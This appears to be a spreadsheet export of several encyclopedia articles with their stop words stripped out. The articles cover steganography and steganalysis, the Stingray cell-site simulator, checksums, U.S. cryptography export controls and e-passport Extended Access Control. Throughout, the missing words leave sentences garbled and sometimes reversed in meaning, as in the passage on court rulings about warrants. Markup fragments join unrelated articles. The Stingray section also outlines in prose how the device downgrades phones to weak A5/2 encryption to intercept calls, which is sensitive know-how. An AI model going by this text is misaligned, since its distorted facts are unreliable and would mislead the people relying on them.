hiding picture traced using paint drawing tool. steganography streaming media since evolving network applications, steganography research shifted image steganography steganography streaming media voice internet protocol (voip). 2003, giannoula developed data hiding technique leading compressed forms source video signals frame-by-frame basis.in 2005, dittmann studied steganography watermarking multimedia contents voip.in 2008, yongfeng huang shanyu tang presented novel approach information hiding bit-rate voip speech stream, published work steganography first-ever effort improve codebook partition using graph theory along quantization index modulation bit-rate streaming media.in 2011 2012, yongfeng huang shanyu tang devised steganographic algorithms codec parameters cover object realise real-time covert voip steganography. their findings published ieee transactions information forensics security. cyber-physical systems/internet things academic work since 2012 demonstrated feasibility steganography cyber-physical systems (cps)/the internet things (iot). some techniques cps/iot steganography overlap network steganography, i.e. hiding data communication protocols used cps/the iot. however, specific techniques hide data components. instance, data stored unused registers iot/cps components states iot/cps actuators. printed digital steganography output form printed documents. message, plaintext, first encrypted traditional means, producing ciphertext. then, innocuous cover text modified contain ciphertext, resulting stegotext. example, letter size, spacing, typeface, characteristics cover text manipulated carry hidden message. only recipient knows technique used recover message decrypt francis bacon developed bacon's cipher technique. ciphertext produced digital steganography methods, however, printable. traditional digital methods rely perturbing noise channel file hide message, such, channel file must transmitted recipient additional noise transmission. printing introduces much noise ciphertext, generally rendering message unrecoverable. there techniques address limitation, notable example ascii steganography. although classic steganography, types modern color laser printers integrate model, serial number, timestamps printout traceability reasons using dot-matrix code made small, yellow dots recognizable naked printer steganography details. using puzzles concealing data puzzle take advantage degrees freedom stating puzzle, using starting information encode within puzzle/puzzle image. instance, steganography using sudoku puzzles many keys possible solutions sudoku puzzle, 6.71×1021. network 1977, kent concisely described potential covert channel signaling general network communication protocols, even traffic encrypted footnote) "encryption-based protection interactive user/computer communication," proceedings fifth data communications symposium, september 1977. 1987, girling first studied covert channels local area network (lan), identified realised three obvious covert channels (two storage channels timing channel), research paper entitled “covert channels lan’s” published ieee transactions software engineering, vol. se-13 february 1987.in 1989, wolf implemented covert channels protocols, e.g. using reserved fields, fields, undefined fields tcp/ip protocol.in 1997, rowland used identification field, initial sequence number acknowledge sequence number fields tcp/ip headers build covert channels.in 2002, kamran ahsan made excellent summary research network steganography.in 2005, steven murdoch stephen lewis contributed chapter entitled "embedding covert channels tcp/ip" "information hiding" book published springer.all information hiding techniques used exchange steganograms telecommunication networks classified general term network steganography. this nomenclature originally introduced krzysztof szczypiorski 2003. contrary typical steganographic methods digital media (images, audio video files) hide data, network steganography uses communication protocols' control elements intrinsic functionality. result, methods harder detect eliminate.typical network steganography methods involve modification properties single network protocol. such modification applied (protocol data unit), time relations exchanged pdus, (hybrid methods).moreover, feasible utilize relation different network protocols enable secret communication. these applications fall term inter-protocol steganography. alternatively, multiple network protocols used simultaneously transfer hidden information so-called control protocols embedded steganographic communications extend capabilities, e.g. allow dynamic overlay routing switching utilized hiding methods network protocols.network steganography covers broad spectrum techniques, include, among others: steganophony concealment messages voice-over-ip conversations, e.g. employment delayed corrupted packets would normally ignored receiver (this method called lack lost audio packets steganography), alternatively, hiding information unused header fields. wlan steganography transmission steganograms wireless local area networks. practical example wlan steganography hiccups system (hidden communication system corrupted networks) terminology taxonomy 2015, taxonomy network hiding methods presented steffen wendzel, sebastian zander summarized core concepts used network steganography research. taxonomy developed recent years several publications authors adjusted domains, steganography. additional terminology discussions steganography generally terminology analogous consistent conventional radio communications technology. however, terms appear specifically software easily confused. these relevant ones digital steganographic systems: payload data covertly communicated. carrier signal, stream, data file hides payload, differs channel, typically means type input, jpeg image. resulting signal, stream, data file encoded payload sometimes called package, stego file, covert message. proportion bytes, samples, signal elements modified encode payload called encoding density typically expressed number files, files considered likely contain payload suspects. suspect identified type statistical analysis referred candidate. countermeasures detection detecting physical steganography requires careful physical examination, including magnification, developer chemicals, ultraviolet light. time-consuming process obvious resource implications, even countries employ many people fellow nationals. however, feasible screen mail certain suspected individuals institutions, prisons prisoner-of-war (pow) camps. during world prisoner camps gave prisoners specially-treated paper would reveal invisible ink. article june 1948 issue paper trade journal technical director united states government printing office morris kantrowitz describe general terms development paper. three prototype papers (sensicoat, anilith, coatalith) used manufacture postcards stationery provided german prisoners canada. pows tried write hidden message, special paper rendered visible. granted least patents related technology, kantrowitz, u.s. patent 2,515,232, "water-detecting paper water-detecting coating composition therefor," patented july 1950, earlier one, "moisture-sensitive paper manufacture thereof," u.s. patent 2,445,586, patented july 1948. similar strategy issues prisoners writing paper ruled water-soluble runs contact water-based invisible ink. computing, steganographically encoded package detection called steganalysis. simplest method detect modified files, however, compare known originals. example, detect information moved graphics website, analyst maintain known clean copies materials compare current contents site. differences, carrier same, comprise payload. general, using extremely high compression rates makes steganography difficult impossible. compression errors provide hiding place data, high compression reduces amount data available hold payload, raising encoding density, facilitates easier detection extreme cases, even casual observation). there variety basic tests done identify whether secret message exists. this process concerned extraction message, different process separate step. basic approaches steganalysis visual aural attacks, structural attacks, statistical attacks. these approaches attempt detect steganographic algorithms used. these algorithms range unsophisticated sophisticated, early algorithms much easier detect statistical anomalies present. size message hidden factor difficult detect. overall size cover object also plays factor well. cover object small message large, distort statistics make easier detect. larger cover object small message decreases statistics gives better chance going unnoticed. steganalysis targets particular algorithm much better success able anomalies left behind. this analysis perform targeted search discover known tendencies since aware behaviors commonly exhibits. when analyzing image least significant bits many images actually random. camera sensor, especially lower-end sensors best quality introduce random bits. this also affected file compression done image. secret messages introduced least significant bits image hidden. steganography tool used camouflage secret message least significant bits introduce random area perfect. this area perfect randomization stands detected comparing least significant bits next-to-least significant bits image compressed.generally, though, many techniques known able hide messages data using steganographic techniques. none are, definition, obvious users employ standard applications, detected specialist tools. others, however, resistant detection—or rather possible reliably distinguish data containing hidden message data containing noise—even sophisticated analysis performed. steganography used conceal deliver effective cyber attacks, referred stegware. term stegware first introduced 2017 describe malicious operation involving steganography vehicle conceal attack. detection steganography challenging, that, adequate defence. therefore, defeating threat transform data destroys hidden messages, process called content threat removal. applications modern printers some modern computer printers steganography, including hewlett-packard xerox brand color laser printers. printers tiny yellow dots page. barely-visible dots contain encoded printer serial numbers date time stamps. example modern practice larger cover message binary data, number bits) relative hidden message, easier hide hidden message analogy, larger "haystack", easier hide "needle"). digital pictures, contain much data, sometimes used hide messages internet digital communication media. clear common practice actually example, 24-bit bitmap uses bits represent three color values (red, green, blue) pixel. blue alone different levels blue intensity. difference 11111111 11111110 value blue intensity likely undetectable human eye. therefore, least significant used less undetectably something else color information. repeated green elements pixel well, possible encode letter ascii text every three pixels. stated somewhat formally, objective making steganographic encoding difficult detect ensure changes carrier (the original signal) injection payload (the signal covertly embed) visually (and ideally, statistically) negligible. changes indistinguishable noise floor carrier. media carrier, media large amount redundant compressible information better suited. from information theoretical point view, means channel must capacity "surface" signal requires. there must redundancy. digital image, noise imaging element; digital audio, noise recording techniques amplification equipment. general, electronics digitize analog signal suffer several noise sources, thermal noise, flicker noise, shot noise. noise provides enough variation captured digital information exploited noise cover hidden data. addition, lossy compression schemes (such jpeg) always introduce error decompressed data, possible exploit steganographic use, well. although steganography digital watermarking seem similar, not. steganography, hidden message remain intact reaches destination. steganography used digital watermarking message (being simply identifier) hidden image source tracked verified (for example, coded anti-piracy) even identify image eurion constellation). case, technique hiding message (here, watermark) must robust prevent tampering. however, digital watermarking sometimes requires brittle watermark, modified easily, check whether image tampered with. that difference steganography digital watermarking. alleged intelligence services 2010, federal bureau investigation alleged russian foreign intelligence service uses customized steganography software embedding encrypted text messages inside image files certain communications "illegal agents" (agents without diplomatic cover) stationed abroad.on april 2019 u.s. department justice unsealed indictment charging xiaoqing zheng, chinese businessman former principal engineer general electric, counts conspiring steal intellectual property trade secrets general electric. zheng allegedly used steganography exfiltrate 20,000 documents general electric tianyi aviation technology nanjing, china, company accused starting backing chinese government. distributed steganography there distributed steganography methods, including methodologies distribute payload multiple carrier files diverse locations make detection difficult. example, u.s. patent 8,527,779 cryptographer william easttom (chuck easttom). online challenge puzzles presented cicada 3301 incorporate steganography cryptography solving techniques since 2012. puzzles involving steganography also featured alternate reality games. communications mystery incorporate steganography solving techniques since 1981. stegoanalysis stegoanalytical algorithms stegoanalytical algorithms cataloged different ways, highlighting: according available information according purpose sought. according information available there possibility cataloging algorithms based information held stegoanalyst terms clear encrypted messages. technique similar cryptography, however, several differences: chosen stego attack: stegoanalyst perceives final target stego stenographic algorithm used. known cover attack: stegoanalyst comprises initial conductive target final target stego. known stego attack: stegoanalyst knows initial carrier target final target stego, addition algorithm used. stego attack: stegoanalist perceives exclusively stego target. chosen message attack: stegoanalyst, following message selected him, originates stego target. known message attack: stegoanalyst owns stego target hidden message, known him. according purpose sought principal purpose steganography transfer information unnoticed, however, possible attacker different pretensions: passive stegoanalysis: alter target stego, therefore, examines target stego order establish whether carries hidden information recovers hidden message, used both. active stegoanalysis: changes initial stego target, therefore, seeks suppress transfer information, exists. also references sources external links overview digital steganography, particularly within images, computationally curious chris league, long island university, 2015 steganography curlie examples showing images hidden images information hiding: steganography digital watermarking. papers information steganography steganalysis research 1995 present. includes steganography software wiki list. neil johnson. detecting steganographic content internet. 2002 paper niels provos peter honeyman published proceedings network distributed system security symposium (san diego, february 6–8, 2002). ndss 2002. internet society, washington, d.c. covert channels tcp/ip suite 1996 paper craig rowland detailing hiding data tcp/ip packets. network steganography centre tutorials. how-to articles subject network steganography (wireless lans, voip steganophony, tcp/ip protocols mechanisms, steganographic router, inter-protocol steganography). krzysztof szczypiorski wojciech mazurczyk network security group. invitation bpcs-steganography. steganography michael raggo, defcon august 2004) file format extension through steganography blake ford khosrow kaikhah computer steganography. theory practice mathcad (rus) 2006 paper konakhovich puzyrenko published mk-press kyiv, ukraine</t>
  </si>
  <si>
    <t>Stingray phone tracker</t>
  </si>
  <si>
    <t>stingray imsi-catcher, cellular phone surveillance device, manufactured harris corporation. initially developed military intelligence community, stingray similar harris devices widespread local state enforcement agencies across canada, united states, united kingdom. stingray also become generic name describe kinds devices. technology stingray imsi-catcher passive (digital analyzer) active (cell-site simulator) capabilities. when operating active mode, device mimics wireless carrier cell tower order force nearby mobile phones cellular data devices connect it.the stingray family devices mounted vehicles, airplanes, helicopters unmanned aerial vehicles. hand-carried versions referred trade name kingfish. active mode operations extracting stored data international mobile subscriber identity (imsi) numbers electronic serial number (esn), writing cellular protocol metadata internal storage forcing increase signal transmission power forcing abundance radio signals transmitted forcing downgrade older less secure communications protocol older protocol allowed target device, making stingray pretend unable communicate up-to-date protocol interception communications data metadata using received signal strength indicators spatially locate cellular device conducting denial service attack radio jamming either general denial service purposes active mode protocol rollback attacks passive mode operations conducting base station surveys, process using over-the-air signals identify legitimate cell sites precisely coverage areas active (cell site simulator) capabilities active mode, stingray force compatible cellular device given area disconnect service provider cell site (e.g., operated verizon, at&amp;t, etc.) establish connection stingray. cases, accomplished stingray broadcast pilot signal either stronger than, made appear stronger than, pilot signals broadcast legitimate cell sites operating area. common function cellular communications protocols cellular device connect cell site offering strongest signal. stingrays exploit function means force temporary connections cellular devices within limited area. extracting data internal storage during process forcing connections compatible cellular devices given area, stingray operator needs determine device desired surveillance target. this accomplished downloading imsi, esn, identifying data devices connected stingray. context, imsi equivalent identifier obtained cellular service provider third-party. stingray downloads data directly device using radio waves.in cases, imsi equivalent identifier target device known stingray operator beforehand. when case, operator download imsi equivalent identifier device connects stingray. when downloaded imsi matches known imsi desired target, dragnet operator proceed conduct specific surveillance operations target device.in cases, imsi equivalent identifier target known stingray operator goal surveillance operation identify cellular devices used known area. example, visual surveillance conducted group protestors, stingray used download imsi equivalent identifier phone within protest area. after identifying phones, locating tracking operations conducted, service providers forced turn account information identifying phone users. forcing increase signal transmission power cellular telephones radio transmitters receivers, much like walkie-talkie. however, cell phone communicates repeater inside nearby cell tower installation. installation, devices take cell calls geographic area repeat cell installations repeat signals onward destination telephone (either radio landline wires). radio used also transmit caller's voice/data back receiver's cell telephone. two-way duplex phone conversation exists interconnections. make work correctly, system allows automatic increases decreases transmitter power (for individual cell phone tower repeater, too) minimum transmit power used complete hold call active, "on", allows users hear heard continuously conversation. goal hold call active least amount transmitting power, mainly conserve batteries efficient. tower system sense cell phone coming clearly order cell phone boost transmit power. user control boosting; occur split second whole conversation. user remote location, power boost continuous. addition carrying voice data, cell phone also transmits data automatically, boosted system detects need. encoding transmissions ensures crosstalk interference occurs nearby cell users. boosting power, however, limited design devices maximum setting. standard systems "high power" thus overpowered secret systems using much boosted power take user's cell phone. overpowered way, cell phone indicate change secret radio programmed hide normal detection. ordinary user know cell phone captured overpowering boosts not. (there ways secret capture need overpower, too.) just person shouting drowns someone whispering, boost watts power cell telephone system overtake control system—in total few, even one, conversation. this strategy requires power, thus simple types secret control. power boosting equipment installed anywhere antenna, including vehicle, perhaps even vehicle move. once secretly boosted system takes control, manipulation possible simple recording voice data total blocking cell phones geographic area. tracking locating stingray used identify track phone compatible cellular data device even device engaged call accessing data services.a stingray closely resembles portable cellphone tower. typically, enforcement officials place stingray vehicle compatible computer software. stingray acts cellular tower send signals specific device connect cell phones programmed connect cellular tower offering best signal. when phone stingray connect, computer system determines strength signal thus distance device. then, vehicle moves another location sends signals connects phone. when signal strength determined enough locations, computer system centralizes phone able find cell phones programmed constantly search strongest signal emitted cell phone towers area. over course day, cell phones connect reconnect multiple towers attempt connect strongest, fastest, closest signal. because designed, signals stingray emits stronger coming surrounding towers. reason, cell phones vicinity connect stingray regardless cell phone owner's knowledge. from there, stingray capable locating device, interfering device, collecting personal data device. denial service claimed used identify, locate, track cellular device, stingray collect communications content forward service provider. instead, device causes disruption service. under scenario, attempt cellular device user place call access data services fail stingray conducting surveillance. august 2018, senator wyden noted harris corporation confirmed stingrays disrupt targeted phone's communications. additionally, noted "while company claims cell-site simulators include feature detects permits delivery emergency calls 9-1-1, officials admitted office feature independently tested part federal communication commission’s certification process, able confirm feature capable detecting passing-through 9-1-1 emergency communications made people deaf, hard hearing, speech disabled using real-time text technology." interception communications content software upgrades, stingray similar harris products used intercept communications content transmitted over-the-air target cellular device legitimate service provider cell site. stingray following man-in-the-middle attack: simulate cell site force connection target device, download target device's imsi identifying information, conduct "gsm active extraction" obtain target device's stored encryption key, downloaded identifying information simulate target device over-the-air, simulating target device, establish connection legitimate cell site authorized provide service target device, encryption authenticate stingray service provider target device, forward signals target device legitimate cell site decrypting recording communications content. "gsm active extraction" performed stingray step three merits additional explanation. phone encrypts communications content using encryption stored card copy stored service provider. while simulating target device explained man-in-the-middle attack, service provider cell site stingray (which believes target device) initiate encryption using stored target device. therefore, stingray needs method obtain target device's stored encryption else man-in-the-middle attack fail. primarily encrypts communications content using a5/1 call encryption cypher. 2008 reported phone's encryption obtained using $1,000 worth computer hardware minutes cryptanalysis performed signals encrypted using a5/1. however, also supports export weakened variant a5/1 called a5/2. this weaker encryption cypher cracked real-time. while a5/1 a5/2 different cypher strengths, underlying encryption stored card. therefore, stingray performs "gsm active extraction" step three man-in-the-middle attack follows: instruct target device weaker a5/2 encryption cypher, collect a5/2 encrypted signals target device, perform cryptanalysis a5/2 signals quickly recover underlying stored encryption key. once encryption obtained, stingray uses comply encryption request made service provider man-in-the-middle attack.a rogue base station force unencrypted links, supported handset software. rogue base station send 'cipher mode settings' element (see 04.08 chapter 10.5.2.9) phone, element clearing marks encryption used. cases phone display could indicate unsafe link—but user interface software phones interrogate handset's radio subsystem insecure mode display warning indication. passive capabilities passive mode, stingray operates either digital analyzer, receives analyzes signals transmitted cellular devices and/or wireless carrier cell sites radio jamming device, transmits signals block communications cellular devices wireless carrier cell sites. "passive mode", meant stingray mimic wireless carrier cell site communicate directly cellular devices. base station (cell site) surveys stingray test phone used conduct base station surveys, process collecting information cell sites, including identification numbers, signal strength, signal coverage areas. when conducting base station surveys, stingray mimics cell phone passively collecting signals transmitted cell-sites area stingray. base station survey data used narrow past locations cellular device used conjunction historical cell site location information ("hcsli") obtained wireless carrier. hcsli includes list cell sites sectors accessed cellular device, date time access made. enforcement often obtain hcsli wireless carriers order determine particular cell phone located past. once information obtained, enforcement cell site locations determine past geographical locations cellular device. however, signal coverage area given cell site change according time day, weather, physical obstructions relation cellular device attempts access service. maps cell site coverage areas used enforcement also lack precision general matter. reasons, beneficial stingray test phone precise coverage areas cell sites appearing hcsli records. this typically done time weather conditions effect hcsli logged. using stingray conduct base station surveys manner allows mapping cell site coverage areas accurately match coverage areas effect cellular device used. usage enforcement united states devices frequently funded grants department homeland security. angeles police department used department homeland security grant 2006 stingray "regional terrorism investigations". however, according electronic frontier foundation, "lapd using investigation imaginable."in addition federal enforcement, military intelligence agencies, stingrays recent years purchased local state enforcement agencies. 2006, harris corporation employees directly conducted wireless surveillance using stingray units behalf palm police department—where harris campus response bomb threat middle school. search conducted without warrant judicial oversight.the american civil liberties union (aclu) confirmed local police cell site simulators washington, nevada, arizona, alaska, missouri, mexico, georgia, massachusetts. state police cell site simulators oklahoma, louisiana, pennsylvania, delaware. local state police cell site simulators california, texas, minnesota, wisconsin, michigan, illinois, indiana, tennessee, north carolina, virginia, florida, maryland, york. police cell site simulators unknown remaining states. however, many agencies disclose stingray technology, statistics still potentially under-representation actual number agencies. according recent information published american civil liberties union, enforcement agencies states stingray technology 2017. since 2014, numbers increased agencies states. following federal agencies united states validated cell-site simulators: federal bureau investigation, drug enforcement administration, secret service, immigration customs enforcement, marshals service, bureau alcohol, tobacco, firearms, explosives, army, navy, marine corps, national guard, special command, national security agency. 2010-14 fiscal years, department justice confirmed spending "more million cell-site simulation technology," department homeland security confirmed spending "more million cell-site simulation technology."several court decisions issued legality using stingray without warrant, courts ruling warrant required others requiring warrant. outside united states police vancouver, british columbia, canada, admitted much speculation across country made stingray device provided rcmp. they also stated intended make devices future. days later, statement edmonton's police force taken confirming devices, said later mean create called miscommunication.privacy international sunday times reported usage stingrays imsi-catchers ireland, irish garda síochána ombudsman commission (gsoc), oversight agency irish police force garda síochána. june 2015, reported investigation news possible false mobile phone towers used london metropolitan police. commissioner bernard hogan-howe refused comment. between february 2015 april 2016, companies united kingdom authorized export imsi-catcher devices states including saudi arabia, uae, turkey. critics expressed concern export surveillance technology countries poor human rights records histories abusing surveillance technology. secrecy increasing devices largely kept secret court system public. 2014, police florida revealed used devices least additional times since 2010 without disclosing courts obtaining warrant. reasons tallahassee police provided pursuing court approval efforts would allegedly violate non-disclosure agreements (ndas) police sign manufacturer. american civil liberties union filed multiple requests public records florida enforcement agencies cell phone tracking devices.local enforcement federal government resisted judicial requests information stingrays, refusing turn information heavily censoring june 2014, american civil liberties union published information court regarding extensive devices local florida police. after publication, united states marshals service seized local police's surveillance records keep coming court.in cases, police refused disclose information courts citing non-disclosure agreements signed harris corporation. defended agreements, saying information technology could allow adversaries circumvent aclu said "potentially unconstitutional government surveillance scale remain hidden public private corporation desires secrecy. certainly concealed judges."in 2015 santa clara county pulled contract negotiations harris stingray units, citing onerous restrictions imposed harris could released public records requests reason exiting negotiations. criticism recent years, legal scholars, public interest advocates, legislators several members judiciary strongly criticized technology enforcement agencies. critics called devices government agencies warrantless cell phone tracking, frequently used without informing court system obtaining warrant. electronic frontier foundation called devices unconstitutional, all-you-can-eat data buffet."in june 2015, wnyc public radio published podcast daniel rigmaiden stingray device.in 2016, professor laura georgetown university center filed formal complaint regarding devices enforcement agencies, taking position devices mimic properties cell phone towers, agencies operating violation regulation, lack appropriate spectrum licenses.on december 2019, american civil liberties union york civil liberties union (nyclu) filed federal lawsuit customs border protection immigrations customs enforcement agencies. according aclu, union filed freedom information request 2017, given access documents. nyclu aclu proceeded lawsuit statement failed, produce range records use, purchase, oversight stingrays." official statement expanding reasoning lawsuit, aclu expressed concern stingrays current future applications, stating using "unlawfully tracking journalists advocates subjecting people invasive searches electronic devices border." countermeasures number countermeasures stingray devices developed, example crypto phones gsmk's cryptophone firewalls identify thwart stingray's actions alert user imsi capture.eff developed system catch stingrays. also authentication agreement (protocol) cellphone surveillance evil twin attack mobile phone tracking kyllo united states (lawsuit thermal image surveillance) united states davis (2014) found warrantless data collection violated constitutional rights, okayed data criminal conviction, data collected good faith man-in-the-middle attack references further reading lye, linda (2014). "stingrays: most common surveillance tool government won't tell about" (pdf). aclu northern california. imsi catchers, specifically harris stingray, extensively used intelligence support activity/task force orange thriller written patten, former counterterrorism intelligence specialist. patten, buried black. task force orange novel. lyrical press/penguin, 2018.</t>
  </si>
  <si>
    <t>Summation check</t>
  </si>
  <si>
    <t>telecommunication, term summation check (sum check) following meanings: checksum based formation digits numeral. note: individual digits usually compared previously computed value. comparison checksums data different occasions different representations data order verify data integrity. references this article incorporates public domain material general services administration document: "federal standard 1037c".</t>
  </si>
  <si>
    <t>Export of cryptography from the United States</t>
  </si>
  <si>
    <t>export cryptographic technology devices united states severely restricted u.s. 1992. gradually became eased around 2000, restrictions still remain today. since world many governments, including u.s. nato allies, regulated export cryptography national security reasons, and, late 1992, cryptography u.s. munitions list auxiliary military equipment.due enormous impact cryptanalysis world governments military value denying current potential enemies access cryptographic systems. since u.s. u.k. believed better cryptographic capabilities nations, intelligence agencies tried regulate dissemination effective cryptographic techniques. they also wished monitor diplomatic communications nations, including emerging post-colonial period whose position cold issues vital.the first amendment made controlling cryptography inside u.s. illegal, controlling access u.s. developments others practical constitutional impediments. accordingly, regulations introduced part munitions controls required licenses export cryptographic methods (and even description); regulations established cryptography beyond certain strength (defined algorithm length key) would licensed export except case-by-case basis. development public release data encryption standard (des) asymmetric techniques 1970s, along rise internet, willingness risk resist prosecution, eventually made policy impossible enforce, late 1990s relaxed u.s., extent elsewhere (e.g., france). late 1997, officials concerned widespread strong encryption frustrate ability provide sigint regarding foreign entities, including terrorist groups operating internationally. officials anticipated american encryption software backed extensive infrastructure, marketed, likely become standard international communications. 1997, louis freeh, director fbi, said enforcement, framing issue simple. time dazzling telecommunications computer technology information extraordinary value, ready availability robust encryption essential. enforcement disputes that. clearly, today's world future, ability encrypt contemporaneous communications stored data vital component information security. often case, however, another aspect encryption issue left unaddressed severe public safety national security ramifications. enforcement unanimous agreement widespread robust non-key recovery encryption ultimately devastate ability fight crime prevent terrorism. uncrackable encryption allow drug lords, spies, terrorists even violent gangs communicate crimes conspiracies impunity. lose remaining vulnerabilities worst criminals terrorists upon enforcement depends successfully investigate often prevent worst crimes. reason, enforcement community unanimous calling balanced solution problem. history cold early days cold war, u.s. allies developed elaborate series export control regulations designed prevent wide range western technology falling hands others, particularly eastern bloc. export technology classed 'critical' required license. cocom organized coordinate western export controls. types technology protected: technology associated weapons ("munitions") dual technology, also commercial applications. u.s., dual technology export controlled department commerce, munitions controlled state department. since immediate post wwii period market cryptography almost entirely military, encryption technology (techniques well equipment and, computers became important, crypto software) included "category miscellaneous articles" later "category xiii auxiliary military equipment" item united states munitions list november 1954. multinational control export cryptography western side cold divide done mechanisms cocom. 1960s, however, financial organizations beginning require strong commercial encryption rapidly growing field wired money transfer. u.s. government's introduction data encryption standard 1975 meant commercial uses high quality encryption would become common, serious problems export control began arise. generally dealt case-by-case export license request proceedings brought computer manufacturers, ibm, large corporate customers. encryption export controls became matter public concern introduction personal computer. phil zimmermann's encryption software distribution internet 1991 first major 'individual level' challenge controls export cryptography. growth electronic commerce 1990s created additional pressure reduced restrictions. videocipher also used scramble satellite audio. 1989, non-encryption cryptography (such access control message authentication) removed export control commodity jurisdiction. 1992, exception formally added usml non-encryption cryptography (and satellite descramblers) deal software publishers association made 40-bit encryption easily exportable using commodity jurisdiction special "7-day" "15-day" review processes (which transferred control state department commerce department). stage western governments had, practice, split personality came encryption; policy made military cryptanalysts, solely concerned preventing 'enemies' acquiring secrets, policy communicated commerce officials whose support industry. shortly afterward, netscape's technology widely adopted method protecting credit card transactions using public cryptography. netscape developed versions browser. "u.s. edition" supported full size (typically 1024-bit larger) public keys combination full size symmetric keys (secret keys) (128-bit 3des 1.0). "international edition" effective lengths reduced bits bits respectively (rsa_export 40-bit 1.0). acquiring 'u.s. domestic' version turned sufficient hassle computer users, even u.s., ended 'international' version, whose weak 40-bit encryption currently broken matter days using single computer. similar situation occurred lotus notes reasons. legal challenges peter junger civil libertarians privacy advocates, widespread availability encryption software outside u.s., perception many companies adverse publicity weak encryption limiting sales growth e-commerce, series relaxations export controls, culminating 1996 president bill clinton signing executive order 13026 transferring commercial encryption munition list commerce control list. furthermore, order stated that, "the software shall considered treated 'technology'" sense export administration regulations. commodity jurisdiction process replaced commodity classification process, provision added allow export 56-bit encryption exporter promised "key recovery" backdoors 1998. 1999, changed allow 56-bit encryption (based rc2, rc4, rc5, cast) 1024-bit exported without backdoors, cipher suites introduced support (rsa_export1024 56-bit des). 2000, department commerce implemented rules greatly simplified export commercial open source software containing cryptography, including allowing length restrictions removed going commodity classification process classify software "retail") adding exception publicly available encryption source code. current status 2009, non-military cryptography exports u.s. controlled department commerce's bureau industry security. some restrictions still exist, even mass market products; particularly regards export "rogue states" terrorist organizations. militarized encryption equipment, tempest-approved electronics, custom cryptographic software, even cryptographic consulting services still require export license(pp. 6–7). furthermore, encryption registration required export "mass market encryption commodities, software components encryption exceeding bits" 36494). addition, items require one-time review notification prior export countries. instance, must notified open-source cryptographic software made publicly available internet, though review required. export regulations relaxed pre-1996 standards, still complex. other countries, notably participating wassenaar arrangement, similar restrictions. u.s. export rules u.s. non-military exports controlled export administration regulations (ear), short name u.s. code federal regulations (cfr) title chapter vii, subchapter encryption items specifically designed, developed, configured, adapted modified military applications (including command, control intelligence applications) controlled department state united states munitions list. terminology encryption export terminology defined part 772.1. particular: encryption component encryption commodity software (but source code), including encryption chips, integrated circuits etc. encryption items include non-military encryption commodities, software, technology. open cryptographic interface mechanism designed allow customer party insert cryptographic functionality without intervention, help assistance manufacturer agents. ancillary cryptography items ones primarily used computing communications, digital right management; games, household appliances; printing, photo video recording (but videoconferencing); business process automation; industrial manufacturing systems (including robotics, fire alarms hvac); automotive, aviation transportation systems.export destinations classified supplement part four country groups subdivisions; country belong group. purposes encryption, groups d:1, important: large list countries subject relaxed encryption export rules short list countries subject stricter export control. notable countries list include china russia short list "terrorist-supporting" countries 2009, includes five countries; previously contained countries also called "terrorist t-6)the supplement part (commerce country chart) contains table country restrictions. line table corresponds country contains reason control column, export controlled item requires license, unless exception applied. purposes encryption, following three reasons control important: national security column anti-terrorism column encryption items currently classification export purposes item classified export control classification number (eccn) help commerce control list (ccl, supplement part 774). particular: 5a002 systems, equipment, electronic assemblies, integrated circuits "information security. reasons control: ns1, at1. 5a992 "mass market" encryption commodities equipment controlled 5a002. reason control: at1. 5b002 equipment development production items classified 5a002, 5b002, 5d002 5e002. reasons control: ns1, at1. 5d002 encryption software. reasons control: ns1, at1. used develop, produce, items classified 5a002, 5b002, 5d002 supporting technology controlled 5e002 modeling functions equipment controlled 5a002 5b002 used certify software controlled 5d002 5d992 encryption software controlled 5d002. reasons control: at1. 5e002 technology development, production equipment controlled 5a002 5b002 software controlled 5d002. reasons control: ns1, at1. 5e992 technology 5x992 items. reasons control: at1.an item either self-classified, classification ("review") requested bis. review required typical items 5a992 5d992 classification. also bernstein united states denied trade screening export control junger daley restrictions import cryptography freak crypto wars references external links crypto survey bureau industry security overview export regulations found licensing basics page. whitfield diffie susan landau, export cryptography 20th 21st centuries. karl leeuw, bergstra, history information security. comprehensive handbook. elsevier, 2007. encryption export controls. report congress rl30273. congressional research service, the library congress. 2001 encryption debate: intelligence aspects. report congress 98-905 congressional research service, the library congress. 1998 encryption technology: congressional issues issue brief congress ib96039. congressional research service, the library congress. 2000 cryptography liberty 2000. international survey encryption policy. electronic privacy information center. washington, 2000 national research council, cryptography's role securing information society. national academy press, washington, d.c. 1996 (full text link available page). evolution government restrictions using exporting encryption technologies (u), micheal schwartzbeck, encryption technologies, circa 1997, formerly secret, approved release redactions september 2014, c06122418</t>
  </si>
  <si>
    <t>Export of cryptography</t>
  </si>
  <si>
    <t>export cryptography transfer country another devices technology related cryptography. early days cold war, united states allies developed elaborate series export control regulations designed prevent wide range western technology falling hands others, particularly eastern bloc. export technology classed 'critical' required license. cocom organized coordinate western export controls. currently, many countries, notably participating wassenaar arrangement, similar restrictions. wassenaar restrictions largely loosensed late 2010s. references also export cryptography united states restrictions import cryptography</t>
  </si>
  <si>
    <t>Extended Access Control</t>
  </si>
  <si>
    <t>extended access control (eac) advanced security features electronic passports protects restricts access sensitive personal data contained rfid chip. contrast common personal data (like bearer's photograph, names, date birth, etc.) protected basic mechanisms, sensitive data (like fingerprints iris images) must protected preventing unauthorized access skimming. chip protected allow sensitive data read (through encrypted channel) authorized passport inspection system.eac introduced icao optional security feature (additional basic access control) restricting access sensitive biometric data electronic mrtd. general idea given: chip must contain chip-individual keys, must processing capabilities additional management required. however, icao leaves actual solution open implementing states. there several different proposed implementations mechanism, must retain backward-compatibility legacy basic access control (bac), mandatory countries. european commission described technology used protect fingerprints member states' e-passports. deadline member states start issuing fingerprint-enabled e-passports june 2009. specification selected e-passports prepared german federal office information security (bsi) technical report tr-03110. several countries implement eac. defined defined requirements: chip terminal authentication. chip authentication (for strong session encryption) chip authentication specification defines handheld device (cap reader) smart card slot, decimal keypad, display capable displaying least characters. chip authentication (ca) functions: authenticate chip prove chip genuine. only genuine chip implement communication securely. establish strongly secured communication channel, using chip-specific pair strong encryption integrity protection.chip authentication add-on basic access control (bac) protection skimming eavesdropping. terminal authentication (access restricted authorized terminals) terminal authentication (ta) used determine whether inspection system (is) allowed read sensitive data e-passport. mechanism based digital certificates come format card verifiable certificates. each inspection system granted card verifiable certificate (cvc) document verifier (dv). inspection system's certificate valid short time period, typically month. inspection system several cvcs installed time, country allows read sensitive data. allows inspection system request items sensitive data, data iris fingerprint recognition.a document verifier certificate granted country verification certificate authority (cvca). these certificates domestic foreign document verifiers. certificates typically issued medium amounts time, half month months. cvca generated country typically valid months years. external links external links openscdp.org open source eac-pki development testing ejbca.org open source (bac eac) specifications</t>
  </si>
  <si>
